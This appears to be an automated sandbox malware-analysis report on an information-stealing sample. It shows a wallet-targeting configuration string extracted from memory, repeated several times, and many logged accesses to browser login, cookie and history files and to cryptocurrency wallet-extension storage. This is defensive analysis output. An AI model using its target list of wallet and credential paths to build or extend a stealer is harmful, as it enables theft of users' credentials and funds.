                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
